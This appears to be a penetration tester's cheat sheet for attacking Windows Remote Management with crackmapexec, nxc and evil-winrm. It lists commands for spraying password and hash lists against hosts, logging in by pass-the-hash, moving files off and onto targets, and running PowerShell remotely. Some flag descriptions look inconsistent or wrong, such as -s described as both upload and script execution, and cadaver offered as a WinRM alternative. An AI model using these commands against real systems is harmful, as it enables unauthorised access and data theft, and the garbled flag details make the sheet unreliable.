Evil-WinRM (5985/5986)
1. ToDo
Scanning
crackmapexec --verbose winrm [--port <port>] <IP>
crackmapexec --verbose winrm [--port <port>] <IP> -u <username> -p <password>
nxc winrm <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc winrm <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success
Initiate connection
evil-winrm -i <IP> [-P <port>] -u <username> -p <password>
evil-winrm -i <IP> [-P <port>] -u <username> -H <hash>
Extract data
While in a WinRM session:
download <source file> <destination file>
While outside a WinRM session:
evil-winrm -i <ip> -u <username> -p <password> -s "source_file" -d "destination_directory"
# Used to upload files onto the target machine
evil-winrm -i <ip> -u <username> -p <password> -g "source_file" -d "destination_directory"
# Used to download files from the target machine
evil-winrm -i <ip> -u <username> -p <password> -s "powershell script"
# Used to run a PowerShell script
Alternative: cadaver
cadaver http://<ip>
# Verify usability with: crackmapexec winrm <ip>
# Look for HTTP entries in the output